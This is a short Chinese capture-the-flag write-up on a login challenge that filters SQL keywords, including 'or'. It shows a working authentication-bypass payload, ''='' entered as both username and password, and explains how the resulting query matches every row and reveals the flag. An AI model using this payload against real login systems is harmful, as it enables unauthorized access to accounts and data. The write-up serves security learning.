题目上说:不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!
可以试试,只要是输入的关键字都被过滤了,双写也被过滤掉了。
用万能密码发现,or被过滤掉了。
这里用到的是admin为:'=',密码为:'='。
原理就是用的SQL语句的查询。
内部的查询语句:
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
输入'='后,查询语句为:
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;
user=''为false,而false=''为true。
这样就相当于:
$sql = “select user from flag where 1 and 1”;
可以去MySQL里试试。
这样就爆出了所有的用户,也拿到了flag。